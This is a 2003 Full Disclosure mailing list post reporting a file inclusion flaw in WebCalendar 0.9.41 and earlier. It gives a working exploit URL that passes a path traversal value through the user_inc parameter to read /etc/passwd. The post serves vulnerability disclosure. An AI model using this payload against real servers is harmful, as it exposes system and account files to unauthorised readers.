Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

WebCalendar Include File

From: noconflic <nocon () texas-shooters com>
Date: Sun, 20 Jul 2003 20:20:15 -0500


Webcalendar 0.9.41 and below.
http://webcalendar.sourceforge.net/

  Since this appears to be public info now. 

Problem: 
  http://sourceforge.net/forum/forum.php?thread_id=901234&forum_id=11588

Exploit:
  http://www.some.host/webcalendar/[filename].php?user_inc=../../../../../etc/passwd   


- nocon
http://nocon.darkflame.net/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: